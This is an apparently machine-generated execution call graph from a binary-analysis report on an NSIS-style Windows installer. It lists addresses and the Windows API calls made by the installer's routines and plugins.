                                                execution_graph 5227 402840 5228 402bbf 18 API calls 5227->5228 5230 40284e 5228->5230 5229 402864 5232 405be2 2 API calls 5229->5232 5230->5229 5231 402bbf 18 API calls 5230->5231 5231->5229 5233 40286a 5232->5233 5255 405c07 GetFileAttributesW CreateFileW 5233->5255 5235 402877 5236 402883 GlobalAlloc 5235->5236 5237 40291a 5235->5237 5240 402911 CloseHandle 5236->5240 5241 40289c 5236->5241 5238 402922 DeleteFileW 5237->5238 5239 402935 5237->5239 5238->5239 5240->5237 5256 403235 SetFilePointer 5241->5256 5243 4028a2 5244 40321f ReadFile 5243->5244 5245 4028ab GlobalAlloc 5244->5245 5246 4028bb 5245->5246 5247 4028ef 5245->5247 5248 403027 32 API calls 5246->5248 5249 405cb9 WriteFile 5247->5249 5250 4028c8 5248->5250 5251 4028fb GlobalFree 5249->5251 5253 4028e6 GlobalFree 5250->5253 5252 403027 32 API calls 5251->5252 5254 40290e 5252->5254 5253->5247 5254->5240 5255->5235 5256->5243 5257 10001000 5260 1000101b 5257->5260 5267 10001516 5260->5267 5262 10001020 5263 10001024 5262->5263 5264 10001027 GlobalAlloc 5262->5264 5265 1000153d 3 API calls 5263->5265 5264->5263 5266 10001019 5265->5266 5268 1000151c 5267->5268 5269 10001522 5268->5269 5270 1000152e GlobalFree 5268->5270 5269->5262 5270->5262 5271 401cc0 5272 402ba2 18 API calls 5271->5272 5273 401cc7 5272->5273 5274 402ba2 18 API calls 5273->5274 5275 401ccf GetDlgItem 5274->5275 5276 402531 5275->5276 5277 4029c0 5278 402ba2 18 API calls 5277->5278 5279 4029c6 5278->5279 5280 4029d4 5279->5280 5281 4029f9 5279->5281 5283 40281e 5279->5283 5280->5283 5285 405f79 wsprintfW 5280->5285 5282 406054 18 API calls 5281->5282 5281->5283 5282->5283 5285->5283 4041 401fc3 4042 401fd5 4041->4042 4043 402087 4041->4043 4064 402bbf 4042->4064 4045 401423 25 API calls 4043->4045 4052 4021e1 4045->4052 4047 402bbf 18 API calls 4048 401fe5 4047->4048 4049 401ffb LoadLibraryExW 4048->4049 4050 401fed GetModuleHandleW 4048->4050 4049->4043 4051 40200c 4049->4051 4050->4049 4050->4051 4070 406477 WideCharToMultiByte 4051->4070 4055 402056 4118 405191 4055->4118 4056 40201d 4058 402025 4056->4058 4059 40203c 4056->4059 4115 401423 4058->4115 4073 10001759 4059->4073 4060 40202d 4060->4052 4062 402079 FreeLibrary 4060->4062 4062->4052 4065 402bcb 4064->4065 4129 406054 4065->4129 4068 401fdc 4068->4047 4071 4064a1 GetProcAddress 4070->4071 4072 402017 4070->4072 4071->4072 4072->4055 4072->4056 4074 10001789 4073->4074 4168 10001b18 4074->4168 4076 10001790 4077 100018a6 4076->4077 4078 100017a1 4076->4078 4079 100017a8 4076->4079 4077->4060 4213 10002286 4078->4213 4198 100022d0 4079->4198 4084 1000180c 4090 10001812 4084->4090 4091 1000184e 4084->4091 4085 100017ee 4226 100024a9 4085->4226 4086 100017d7 4101 100017cd 4086->4101 4223 10002b5f 4086->4223 4087 100017be 4089 100017c4 4087->4089 4095 100017cf 4087->4095 4089->4101 4209 100028a4 4089->4209 4097 100015b4 3 API calls 4090->4097 4093 100024a9 10 API calls 4091->4093 4099 10001840 4093->4099 4094 100017f4 4237 100015b4 4094->4237 4217 10002645 4095->4217 4098 10001828 4097->4098 4103 100024a9 10 API calls 4098->4103 4106 10001895 4099->4106 4248 1000246c 4099->4248 4101->4084 4101->4085 4103->4099 4105 100017d5 4105->4101 4106->4077 4108 1000189f GlobalFree 4106->4108 4108->4077 4112 10001881 4112->4106 4252 1000153d wsprintfW 4112->4252 4113 1000187a FreeLibrary 4113->4112 4116 405191 25 API calls 4115->4116 4117 401431 4116->4117 4117->4060 4119 4051ac 4118->4119 4128 40524e 4118->4128 4120 4051c8 lstrlenW 4119->4120 4121 406054 18 API calls 4119->4121 4122 4051f1 4120->4122 4123 4051d6 lstrlenW 4120->4123 4121->4120 4125 405204 4122->4125 4126 4051f7 SetWindowTextW 4122->4126 4124 4051e8 lstrcatW 4123->4124 4123->4128 4124->4122 4127 40520a SendMessageW SendMessageW SendMessageW 4125->4127 4125->4128 4126->4125 4127->4128 4128->4060 4141 406061 4129->4141 4130 4062ac 4131 402bec 4130->4131 4163 406032 lstrcpynW 4130->4163 4131->4068 4147 4062c6 4131->4147 4133 406114 GetVersion 4133->4141 4134 40627a lstrlenW 4134->4141 4135 406054 10 API calls 4135->4134 4138 40618f GetSystemDirectoryW 4138->4141 4140 4061a2 GetWindowsDirectoryW 4140->4141 4141->4130 4141->4133 4141->4134 4141->4135 4141->4138 4141->4140 4142 4062c6 5 API calls 4141->4142 4143 406054 10 API calls 4141->4143 4144 40621b lstrcatW 4141->4144 4145 4061d6 SHGetSpecialFolderLocation 4141->4145 4156 405eff RegOpenKeyExW 4141->4156 4161 405f79 wsprintfW 4141->4161 4162 406032 lstrcpynW 4141->4162 4142->4141 4143->4141 4144->4141 4145->4141 4146 4061ee SHGetPathFromIDListW CoTaskMemFree 4145->4146 4146->4141 4153 4062d3 4147->4153 4148 406349 4149 40634e CharPrevW 4148->4149 4151 40636f 4148->4151 4149->4148 4150 40633c CharNextW 4150->4148 4150->4153 4151->4068 4153->4148 4153->4150 4154 406328 CharNextW 4153->4154 4155 406337 CharNextW 4153->4155 4164 405a13 4153->4164 4154->4153 4155->4150 4157 405f73 4156->4157 4158 405f33 RegQueryValueExW 4156->4158 4157->4141 4159 405f54 RegCloseKey 4158->4159 4159->4157 4161->4141 4162->4141 4163->4131 4165 405a19 4164->4165 4166 405a2f 4165->4166 4167 405a20 CharNextW 4165->4167 4166->4153 4167->4165 4255 1000121b GlobalAlloc 4168->4255 4170 10001b3c 4256 1000121b GlobalAlloc 4170->4256 4172 10001d7a GlobalFree GlobalFree GlobalFree 4173 10001d97 4172->4173 4187 10001de1 4172->4187 4174 100020ee 4173->4174 4182 10001dac 4173->4182 4173->4187 4176 10002110 GetModuleHandleW 4174->4176 4174->4187 4175 10001c1d GlobalAlloc 4194 10001b47 4175->4194 4177 10002121 LoadLibraryW 4176->4177 4178 10002136 4176->4178 4177->4178 4177->4187 4263 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte 4178->4263 4179 10001c68 lstrcpyW 4183 10001c72 lstrcpyW 4179->4183 4180 10001c86 GlobalFree 4180->4194 4182->4187 4259 1000122c 4182->4259 4183->4194 4184 10002195 lstrlenW 4186 100015ff 4 API calls 4184->4186 4195 100021af 4186->4195 4187->4076 4188 10002148 4188->4184 4188->4187 4190 10002048 4190->4187 4191 10002090 lstrcpyW 4190->4191 4191->4187 4192 10001cc4 4192->4194 4257 1000158f GlobalSize GlobalAlloc 4192->4257 4193 10001f37 GlobalFree 4193->4194 4194->4172 4194->4175 4194->4179 4194->4180 4194->4183 4194->4187 4194->4190 4194->4192 4194->4193 4197 1000122c 2 API calls 4194->4197 4262 1000121b GlobalAlloc 4194->4262 4195->4187 4197->4194 4200 100022e8 4198->4200 4199 1000122c GlobalAlloc lstrcpynW 4199->4200 4200->4199 4202 10002415 GlobalFree 4200->4202 4203 100023d3 lstrlenW 4200->4203 4204 100023ba GlobalAlloc CLSIDFromString 4200->4204 4205 1000238f GlobalAlloc 4200->4205 4266 100012ba 4200->4266 4202->4200 4206 100017ae 4202->4206 4203->4202 4207 100023b8 4203->4207 4204->4202 4205->4207 4206->4086 4206->4087 4206->4101 4207->4202 4270 100025d9 4207->4270 4211 100028b6 4209->4211 4210 1000295b CreateFileA 4212 10002979 4210->4212 4211->4210 4212->4101 4214 10002296 4213->4214 4215 100017a7 4213->4215 4214->4215 4216 100022a8 GlobalAlloc 4214->4216 4215->4079 4216->4214 4221 10002661 4217->4221 4218 100026b2 GlobalAlloc 4222 100026d4 4218->4222 4219 100026c5 4220 100026ca GlobalSize 4219->4220 4219->4222 4220->4222 4221->4218 4221->4219 4222->4105 4224 10002b6a 4223->4224 4225 10002baa GlobalFree 4224->4225 4273 1000121b GlobalAlloc 4226->4273 4228 10002530 StringFromGUID2 4233 100024b3 4228->4233 4229 10002541 lstrcpynW 4229->4233 4230 1000250b MultiByteToWideChar 4230->4233 4231 10002571 GlobalFree 4231->4233 4232 10002554 wsprintfW 4232->4233 4233->4228 4233->4229 4233->4230 4233->4231 4233->4232 4234 100025ac GlobalFree 4233->4234 4235 10001272 2 API calls 4233->4235 4274 100012e1 4233->4274 4234->4094 4235->4233 4278 1000121b GlobalAlloc 4237->4278 4239 100015ba 4241 100015e1 4239->4241 4242 100015c7 lstrcpyW 4239->4242 4243 100015fb 4241->4243 4244 100015e6 wsprintfW 4241->4244 4242->4243 4245 10001272 4243->4245 4244->4243 4246 100012b5 GlobalFree 4245->4246 4247 1000127b GlobalAlloc lstrcpynW 4245->4247 4246->4099 4247->4246 4249 10001861 4248->4249 4250 1000247a 4248->4250 4249->4112 4249->4113 4250->4249 4251 10002496 GlobalFree 4250->4251 4251->4250 4253 10001272 2 API calls 4252->4253 4254 1000155e 4253->4254 4254->4106 4255->4170 4256->4194 4258 100015ad 4257->4258 4258->4192 4265 1000121b GlobalAlloc 4259->4265 4261 1000123b lstrcpynW 4261->4187 4262->4194 4264 1000163f GlobalFree 4263->4264 4264->4188 4265->4261 4267 100012c1 4266->4267 4268 1000122c 2 API calls 4267->4268 4269 100012df 4268->4269 4269->4200 4271 100025e7 VirtualAlloc 4270->4271 4272 1000263d 4270->4272 4271->4272 4272->4207 4273->4233 4275 100012ea 4274->4275 4276 1000130c 4274->4276 4275->4276 4277 100012f0 lstrcpyW 4275->4277 4276->4233 4277->4276 4278->4239 5286 404244 lstrlenW 5287 404263 5286->5287 5288 404265 WideCharToMultiByte 5286->5288 5287->5288 5289 4016c4 5290 402bbf 18 API calls 5289->5290 5291 4016ca GetFullPathNameW 5290->5291 5292 4016e4 5291->5292 5298 401706 5291->5298 5295 406375 2 API calls 5292->5295 5292->5298 5293 40171b GetShortPathNameW 5294 402a4c 5293->5294 5296 4016f6 5295->5296 5296->5298 5299 406032 lstrcpynW 5296->5299 5298->5293 5298->5294 5299->5298 5300 40454a 5301 404580 5300->5301 5302 40455a 5300->5302 5304 40415d 8 API calls 5301->5304 5303 4040f6 19 API calls 5302->5303 5305 404567 SetDlgItemTextW 5303->5305 5306 40458c 5304->5306 5305->5301 5307 4014cb 5308 405191 25 API calls 5307->5308 5309 4014d2 5308->5309 5310 40194e 5311 402bbf 18 API calls 5310->5311 5312 401955 lstrlenW 5311->5312 5313 402531 5312->5313 5314 4027ce 5315 4027d6 5314->5315 5316 4027da FindNextFileW 5315->5316 5319 4027ec 5315->5319 5317 402833 5316->5317 5316->5319 5320 406032 lstrcpynW 5317->5320 5320->5319 4291 4052d0 4292 4052f1 GetDlgItem GetDlgItem GetDlgItem 4291->4292 4293 40547a 4291->4293 4337 40412b SendMessageW 4292->4337 4295 405483 GetDlgItem CreateThread FindCloseChangeNotification 4293->4295 4296 4054ab 4293->4296 4295->4296 4360 405264 OleInitialize 4295->4360 4297 4054d6 4296->4297 4299 4054c2 ShowWindow ShowWindow 4296->4299 4300 4054fb 4296->4300 4301 4054e2 4297->4301 4302 405536 4297->4302 4298 405361 4307 405368 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4298->4307 4342 40412b SendMessageW 4299->4342 4346 40415d 4300->4346 4304 405510 ShowWindow 4301->4304 4305 4054ea 4301->4305 4302->4300 4310 405544 SendMessageW 4302->4310 4313 405530 4304->4313 4314 405522 4304->4314 4343 4040cf 4305->4343 4308 4053d6 4307->4308 4309 4053ba SendMessageW SendMessageW 4307->4309 4315 4053e9 4308->4315 4316 4053db SendMessageW 4308->4316 4309->4308 4312 405509 4310->4312 4317 40555d CreatePopupMenu 4310->4317 4319 4040cf SendMessageW 4313->4319 4318 405191 25 API calls 4314->4318 4338 4040f6 4315->4338 4316->4315 4320 406054 18 API calls 4317->4320 4318->4313 4319->4302 4322 40556d AppendMenuW 4320->4322 4324 40558a GetWindowRect 4322->4324 4325 40559d TrackPopupMenu 4322->4325 4323 4053f9 4326 405402 ShowWindow 4323->4326 4327 405436 GetDlgItem SendMessageW 4323->4327 4324->4325 4325->4312 4328 4055b8 4325->4328 4329 405425 4326->4329 4330 405418 ShowWindow 4326->4330 4327->4312 4331 40545d SendMessageW SendMessageW 4327->4331 4332 4055d4 SendMessageW 4328->4332 4341 40412b SendMessageW 4329->4341 4330->4329 4331->4312 4332->4332 4333 4055f1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4332->4333 4335 405616 SendMessageW 4333->4335 4335->4335 4336 40563f GlobalUnlock SetClipboardData CloseClipboard 4335->4336 4336->4312 4337->4298 4339 406054 18 API calls 4338->4339 4340 404101 SetDlgItemTextW 4339->4340 4340->4323 4341->4327 4342->4297 4344 4040d6 4343->4344 4345 4040dc SendMessageW 4343->4345 4344->4345 4345->4300 4347 404175 GetWindowLongW 4346->4347 4357 4041fe 4346->4357 4348 404186 4347->4348 4347->4357 4349 404195 GetSysColor 4348->4349 4350 404198 4348->4350 4349->4350 4351 4041a8 SetBkMode 4350->4351 4352 40419e SetTextColor 4350->4352 4353 4041c0 GetSysColor 4351->4353 4354 4041c6 4351->4354 4352->4351 4353->4354 4355 4041d7 4354->4355 4356 4041cd SetBkColor 4354->4356 4355->4357 4358 4041f1 CreateBrushIndirect 4355->4358 4359 4041ea DeleteObject 4355->4359 4356->4355 4357->4312 4358->4357 4359->4358 4367 404142 4360->4367 4362 4052ae 4363 404142 SendMessageW 4362->4363 4364 4052c0 OleUninitialize 4363->4364 4365 405287 4365->4362 4370 401389 4365->4370 4368 40415a 4367->4368 4369 40414b SendMessageW 4367->4369 4368->4365 4369->4368 4372 401390 4370->4372 4371 4013fe 4371->4365 4372->4371 4373 4013cb MulDiv SendMessageW 4372->4373 4373->4372 4374 401754 4375 402bbf 18 API calls 4374->4375 4376 40175b 4375->4376 4380 405c36 4376->4380 4378 401762 4379 405c36 2 API calls 4378->4379 4379->4378 4381 405c43 GetTickCount GetTempFileNameW 4380->4381 4382 405c7d 4381->4382 4383 405c79 4381->4383 4382->4378 4383->4381 4383->4382 4400 401d56 GetDC GetDeviceCaps 4401 402ba2 18 API calls 4400->4401 4402 401d74 MulDiv ReleaseDC 4401->4402 4403 402ba2 18 API calls 4402->4403 4404 401d93 4403->4404 4405 406054 18 API calls 4404->4405 4406 401dcc CreateFontIndirectW 4405->4406 4407 402531 4406->4407 4408 4014d7 4409 402ba2 18 API calls 4408->4409 4410 4014dd Sleep 4409->4410 4412 402a4c 4410->4412 5321 401a57 5322 402ba2 18 API calls 5321->5322 5323 401a5d 5322->5323 5324 402ba2 18 API calls 5323->5324 5325 401a05 5324->5325 5326 40155b 5327 4029f2 5326->5327 5330 405f79 wsprintfW 5327->5330 5329 4029f7 5330->5329 4417 401ddc 4418 402ba2 18 API calls 4417->4418 4419 401de2 4418->4419 4420 402ba2 18 API calls 4419->4420 4421 401deb 4420->4421 4422 401df2 ShowWindow 4421->4422 4423 401dfd EnableWindow 4421->4423 4424 402a4c 4422->4424 4423->4424 4516 401bdf 4517 402ba2 18 API calls 4516->4517 4518 401be6 4517->4518 4519 402ba2 18 API calls 4518->4519 4520 401bf0 4519->4520 4521 401c00 4520->4521 4522 402bbf 18 API calls 4520->4522 4523 401c10 4521->4523 4524 402bbf 18 API calls 4521->4524 4522->4521 4525 401c1b 4523->4525 4526 401c5f 4523->4526 4524->4523 4528 402ba2 18 API calls 4525->4528 4527 402bbf 18 API calls 4526->4527 4529 401c64 4527->4529 4530 401c20 4528->4530 4532 402bbf 18 API calls 4529->4532 4531 402ba2 18 API calls 4530->4531 4533 401c29 4531->4533 4534 401c6d FindWindowExW 4532->4534 4535 401c31 SendMessageTimeoutW 4533->4535 4536 401c4f SendMessageW 4533->4536 4537 401c8f 4534->4537 4535->4537 4536->4537 5331 4022df 5332 402bbf 18 API calls 5331->5332 5333 4022ee 5332->5333 5334 402bbf 18 API calls 5333->5334 5335 4022f7 5334->5335 5336 402bbf 18 API calls 5335->5336 5337 402301 GetPrivateProfileStringW 5336->5337 5338 401960 5339 402ba2 18 API calls 5338->5339 5340 401967 5339->5340 5341 402ba2 18 API calls 5340->5341 5342 401971 5341->5342 5343 402bbf 18 API calls 5342->5343 5344 40197a 5343->5344 5345 40198e lstrlenW 5344->5345 5346 4019ca 5344->5346 5347 401998 5345->5347 5347->5346 5351 406032 lstrcpynW 5347->5351 5349 4019b3 5349->5346 5350 4019c0 lstrlenW 5349->5350 5350->5346 5351->5349 5352 401662 5353 402bbf 18 API calls 5352->5353 5354 401668 5353->5354 5355 406375 2 API calls 5354->5355 5356 40166e 5355->5356 4570 7e105a 4573 7e1112 4570->4573 4651 7e1096 GetModuleHandleW GetProcAddress 4573->4651 4576 7e128c GlobalAlloc 4578 7e12aa 4576->4578 4577 7e1147 GetModuleFileNameW GlobalAlloc 4579 7e118e 4577->4579 4580 7e12c2 FindWindowExW FindWindowExW 4578->4580 4594 7e12e4 4578->4594 4581 7e11ae 4579->4581 4582 7e1194 CharPrevW 4579->4582 4580->4594 4584 7e11ce GetTempFileNameW CopyFileW 4581->4584 4585 7e11b8 4581->4585 4582->4579 4582->4581 4587 7e126d lstrcatW lstrlenW 4584->4587 4588 7e1203 CreateFileW CreateFileMappingW MapViewOfFile 4584->4588 4667 7e1a73 4585->4667 4587->4578 4590 7e125f CloseHandle CloseHandle 4588->4590 4591 7e1239 UnmapViewOfFile 4588->4591 4589 7e11c2 GlobalFree 4593 7e1085 4589->4593 4590->4587 4591->4590 4595 7e1326 4594->4595 4654 7e1a33 4594->4654 4659 7e1849 lstrlenW lstrlenW 4594->4659 4596 7e132b 4595->4596 4597 7e1357 GetVersion 4595->4597 4598 7e1a73 2 API calls 4596->4598 4599 7e13fc 4597->4599 4600 7e13ca GlobalAlloc 4597->4600 4604 7e1335 4598->4604 4602 7e1406 InitializeSecurityDescriptor SetSecurityDescriptorDacl 4599->4602 4603 7e1424 CreatePipe 4599->4603 4606 7e16f8 lstrcpyW 4600->4606 4608 7e13f2 GlobalLock 4600->4608 4602->4603 4603->4606 4607 7e1441 CreatePipe 4603->4607 4604->4589 4611 7e1349 DeleteFileW 4604->4611 4609 7e170a 4606->4609 4607->4606 4610 7e1458 GetStartupInfoW CreateProcessW 4607->4610 4608->4599 4612 7e1718 4609->4612 4613 7e1710 4609->4613 4610->4606 4614 7e14a6 GetTickCount 4610->4614 4611->4589 4616 7e1731 4612->4616 4620 7e1726 4612->4620 4615 7e1a73 2 API calls 4613->4615 4647 7e14af 4614->4647 4615->4612 4617 7e174c 4616->4617 4618 7e173a lstrcpyW 4616->4618 4621 7e176d 4617->4621 4622 7e1755 wsprintfW 4617->4622 4618->4617 4619 7e14c2 PeekNamedPipe 4623 7e14dc GetTickCount ReadFile 4619->4623 4619->4647 4624 7e17dd 3 API calls 4620->4624 4627 7e1a73 2 API calls 4621->4627 4622->4621 4663 7e10d3 lstrlenA 4623->4663 4629 7e172f 4624->4629 4625 7e1692 GetTickCount 4626 7e16c0 Sleep 4625->4626 4630 7e16a1 TerminateProcess lstrcpyW 4625->4630 4631 7e16c8 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 4626->4631 4632 7e1779 6 API calls 4627->4632 4629->4616 4630->4631 4631->4647 4634 7e17a8 4632->4634 4633 7e1520 lstrlenW 4635 7e1550 lstrlenW GlobalSize 4633->4635 4636 7e1531 lstrlenW lstrcpynW 4633->4636 4637 7e17ba GlobalFree 4634->4637 4638 7e17b1 DeleteFileW 4634->4638 4639 7e159e lstrcatW EnumDisplaySettingsA 4635->4639 4640 7e156d GlobalUnlock GlobalReAlloc 4635->4640 4636->4631 4637->4593 4641 7e17ca GlobalUnlock GlobalFree 4637->4641 4638->4637 4643 7e15b2 GlobalSize 4639->4643 4640->4606 4642 7e1594 GlobalLock 4640->4642 4641->4593 4642->4639 4644 7e15d4 lstrlenW 4643->4644 4643->4647 4645 7e15f3 lstrcpyW 4644->4645 4644->4647 4645->4647 4646 7e1849 4 API calls 4646->4647 4647->4609 4647->4619 4647->4625 4647->4626 4647->4631 4647->4633 4647->4643 4647->4645 4647->4646 4648 7e165f CharNextW 4647->4648 4650 7e164e 4647->4650 4648->4647 4650->4647 4670 7e17dd 4650->4670 4652 7e10c5 4651->4652 4653 7e10b8 GetCurrentProcess 4651->4653 4652->4576 4652->4577 4653->4652 4655 7e1a6c 4654->4655 4656 7e1a3d 4654->4656 4655->4594 4656->4655 4657 7e1a5d GlobalFree 4656->4657 4658 7e1a4a lstrcpyW 4656->4658 4657->4655 4658->4657 4660 7e186a 4659->4660 4661 7e18a4 4659->4661 4660->4661 4662 7e1893 CharNextW lstrlenW 4660->4662 4661->4594 4662->4660 4662->4661 4664 7e10ee MultiByteToWideChar 4663->4664 4665 7e1102 lstrcpyW 4663->4665 4666 7e110c 4664->4666 4665->4666 4666->4647 4668 7e1a7c GlobalAlloc lstrcpynW 4667->4668 4669 7e1ab6 4667->4669 4668->4669 4669->4589 4671 7e17fd SendMessageW SendMessageW SendMessageW 4670->4671 4672 7e1845 4670->4672 4671->4672 4672->4650 5357 4019e4 5358 402bbf 18 API calls 5357->5358 5359 4019eb 5358->5359 5360 402bbf 18 API calls 5359->5360 5361 4019f4 5360->5361 5362 4019fb lstrcmpiW 5361->5362 5363 401a0d lstrcmpW 5361->5363 5364 401a01 5362->5364 5363->5364 4673 4025e5 4674 402ba2 18 API calls 4673->4674 4683 4025f4 4674->4683 4675 40272d 4676 40263a ReadFile 4676->4675 4676->4683 4677 4026d3 4677->4675 4677->4683 4687 405ce8 SetFilePointer 4677->4687 4680 40267a MultiByteToWideChar 4680->4683 4681 40272f 4698 405f79 wsprintfW 4681->4698 4683->4675 4683->4676 4683->4677 4683->4680 4683->4681 4684 4026a0 SetFilePointer MultiByteToWideChar 4683->4684 4685 402740 4683->4685 4696 405c8a ReadFile 4683->4696 4684->4683 4685->4675 4686 402761 SetFilePointer 4685->4686 4686->4675 4688 405d04 4687->4688 4695 405d20 4687->4695 4689 405c8a ReadFile 4688->4689 4690 405d10 4689->4690 4691 405d51 SetFilePointer 4690->4691 4692 405d29 SetFilePointer 4690->4692 4690->4695 4691->4695 4692->4691 4693 405d34 4692->4693 4699 405cb9 WriteFile 4693->4699 4695->4677 4697 405ca8 4696->4697 4697->4683 4698->4675 4700 405cd7 4699->4700 4700->4695 4701 401e66 4702 402bbf 18 API calls 4701->4702 4703 401e6c 4702->4703 4704 405191 25 API calls 4703->4704 4705 401e76 4704->4705 4719 405712 CreateProcessW 4705->4719 4708 40281e 4709 401edb CloseHandle 4709->4708 4710 401e8c WaitForSingleObject 4711 401e9e 4710->4711 4712 401eb0 GetExitCodeProcess 4711->4712 4722 406444 4711->4722 4713 401ec2 4712->4713 4714 401ecf 4712->4714 4726 405f79 wsprintfW 4713->4726 4714->4709 4717 401ecd 4714->4717 4717->4709 4720 401e7c 4719->4720 4721 405745 CloseHandle 4719->4721 4720->4708 4720->4709 4720->4710 4721->4720 4723 406461 PeekMessageW 4722->4723 4724 401ea5 WaitForSingleObject 4723->4724 4725 406457 DispatchMessageW 4723->4725 4724->4711 4725->4723 4726->4717 4727 401767 4728 402bbf 18 API calls 4727->4728 4729 40176e 4728->4729 4730 401796 4729->4730 4731 40178e 4729->4731 4791 406032 lstrcpynW 4730->4791 4790 406032 lstrcpynW 4731->4790 4734 4017a1 4792 4059e6 lstrlenW CharPrevW 4734->4792 4735 401794 4738 4062c6 5 API calls 4735->4738 4744 4017b3 4738->4744 4742 4017c5 CompareFileTime 4742->4744 4743 401885 4745 405191 25 API calls 4743->4745 4744->4742 4744->4743 4747 406032 lstrcpynW 4744->4747 4753 406054 18 API calls 4744->4753 4765 40185c 4744->4765 4766 405be2 GetFileAttributesW 4744->4766 4769 405c07 GetFileAttributesW CreateFileW 4744->4769 4795 406375 FindFirstFileW 4744->4795 4798 405777 4744->4798 4748 40188f 4745->4748 4746 405191 25 API calls 4749 401871 4746->4749 4747->4744 4770 403027 4748->4770 4752 4018b6 SetFileTime 4754 4018c8 CloseHandle 4752->4754 4753->4744 4755 4018d9 4754->4755 4756 402288 4754->4756 4757 4018f1 4755->4757 4758 4018de 4755->4758 4756->4749 4759 406054 18 API calls 4757->4759 4760 406054 18 API calls 4758->4760 4762 4018f9 4759->4762 4761 4018e6 lstrcatW 4760->4761 4761->4762 4764 405777 MessageBoxIndirectW 4762->4764 4764->4756 4765->4746 4765->4749 4767 405c01 4766->4767 4768 405bf4 SetFileAttributesW 4766->4768 4767->4744 4768->4767 4769->4744 4771 403040 4770->4771 4772 40306e 4771->4772 4805 403235 SetFilePointer 4771->4805 4802 40321f 4772->4802 4776 4031b8 4778 4031fa 4776->4778 4783 4031bc 4776->4783 4777 40308b GetTickCount 4779 4018a2 4777->4779 4786 4030b7 4777->4786 4780 40321f ReadFile 4778->4780 4779->4752 4779->4754 4780->4779 4781 40321f ReadFile 4781->4786 4782 40321f ReadFile 4782->4783 4783->4779 4783->4782 4784 405cb9 WriteFile 4783->4784 4784->4783 4785 40310d GetTickCount 4785->4786 4786->4779 4786->4781 4786->4785 4787 403132 MulDiv wsprintfW 4786->4787 4789 405cb9 WriteFile 4786->4789 4788 405191 25 API calls 4787->4788 4788->4786 4789->4786 4790->4735 4791->4734 4793 405a02 lstrcatW 4792->4793 4794 4017a7 lstrcatW 4792->4794 4793->4794 4794->4735 4796 406396 4795->4796 4797 40638b FindClose 4795->4797 4796->4744 4797->4796 4799 40578c 4798->4799 4800 4057d8 4799->4800 4801 4057a0 MessageBoxIndirectW 4799->4801 4800->4744 4801->4800 4803 405c8a ReadFile 4802->4803 4804 403079 4803->4804 4804->4776 4804->4777 4804->4779 4805->4772 5365 4048e7 5366 404913 5365->5366 5367 4048f7 5365->5367 5369 404946 5366->5369 5370 404919 SHGetPathFromIDListW 5366->5370 5376 40575b GetDlgItemTextW 5367->5376 5372 404929 5370->5372 5375 404930 SendMessageW 5370->5375 5371 404904 SendMessageW 5371->5366 5374 40140b 2 API calls 5372->5374 5374->5375 5375->5369 5376->5371 5377 401ee9 5378 402bbf 18 API calls 5377->5378 5379 401ef0 5378->5379 5380 406375 2 API calls 5379->5380 5381 401ef6 5380->5381 5383 401f07 5381->5383 5384 405f79 wsprintfW 5381->5384 5384->5383 5385 100018a9 5386 100018cc 5385->5386 5387 100018ff GlobalFree 5386->5387 5388 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5386->5388 5387->5388 5389 10001272 2 API calls 5388->5389 5390 10001a87 GlobalFree GlobalFree 5389->5390 5391 4021ea 5392 402bbf 18 API calls 5391->5392 5393 4021f0 5392->5393 5394 402bbf 18 API calls 5393->5394 5395 4021f9 5394->5395 5396 402bbf 18 API calls 5395->5396 5397 402202 5396->5397 5398 406375 2 API calls 5397->5398 5399 40220b 5398->5399 5400 40221c lstrlenW lstrlenW 5399->5400 5401 40220f 5399->5401 5403 405191 25 API calls 5400->5403 5402 405191 25 API calls 5401->5402 5405 402217 5401->5405 5402->5405 5404 40225a SHFileOperationW 5403->5404 5404->5401 5404->5405 4806 40156b 4807 401584 4806->4807 4808 40157b ShowWindow 4806->4808 4809 401592 ShowWindow 4807->4809 4810 402a4c 4807->4810 4808->4807 4809->4810 5406 40226e 5407 402275 5406->5407 5411 402288 5406->5411 5408 406054 18 API calls 5407->5408 5409 402282 5408->5409 5410 405777 MessageBoxIndirectW 5409->5410 5410->5411 5412 4014f1 SetForegroundWindow 5413 402a4c 5412->5413 5414 7e194f GetCommandLineW lstrcpynW 5415 7e19a3 5414->5415 5416 7e19c4 CharNextW 5415->5416 5417 7e19b9 CharNextW 5415->5417 5419 7e19c9 CreateProcessW 5416->5419 5417->5415 5420 7e1a28 ExitProcess 5419->5420 5421 7e19f7 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 5419->5421 4815 401673 4816 402bbf 18 API calls 4815->4816 4817 40167a 4816->4817 4818 402bbf 18 API calls 4817->4818 4819 401683 4818->4819 4820 402bbf 18 API calls 4819->4820 4821 40168c MoveFileW 4820->4821 4822 401698 4821->4822 4823 40169f 4821->4823 4825 401423 25 API calls 4822->4825 4824 406375 2 API calls 4823->4824 4827 4021e1 4823->4827 4826 4016ae 4824->4826 4825->4827 4826->4827 4829 405ed3 MoveFileExW 4826->4829 4830 405ee7 4829->4830 4832 405ef4 4829->4832 4833 405d61 lstrcpyW 4830->4833 4832->4822 4834 405d89 4833->4834 4835 405daf GetShortPathNameW 4833->4835 4860 405c07 GetFileAttributesW CreateFileW 4834->4860 4837 405dc4 4835->4837 4838 405ece 4835->4838 4837->4838 4840 405dcc wsprintfA 4837->4840 4838->4832 4839 405d93 CloseHandle GetShortPathNameW 4839->4838 4841 405da7 4839->4841 4842 406054 18 API calls 4840->4842 4841->4835 4841->4838 4843 405df4 4842->4843 4861 405c07 GetFileAttributesW CreateFileW 4843->4861 4845 405e01 4845->4838 4846 405e10 GetFileSize GlobalAlloc 4845->4846 4847 405e32 4846->4847 4848 405ec7 CloseHandle 4846->4848 4849 405c8a ReadFile 4847->4849 4848->4838 4850 405e3a 4849->4850 4850->4848 4862 405b6c lstrlenA 4850->4862 4853 405e51 lstrcpyA 4856 405e73 4853->4856 4854 405e65 4855 405b6c 4 API calls 4854->4855 4855->4856 4857 405eaa SetFilePointer 4856->4857 4858 405cb9 WriteFile 4857->4858 4859 405ec0 GlobalFree 4858->4859 4859->4848 4860->4839 4861->4845 4863 405bad lstrlenA 4862->4863 4864 405b86 lstrcmpiA 4863->4864 4866 405bb5 4863->4866 4865 405ba4 CharNextA 4864->4865 4864->4866 4865->4863 4866->4853 4866->4854 5422 100016b6 5423 100016e5 5422->5423 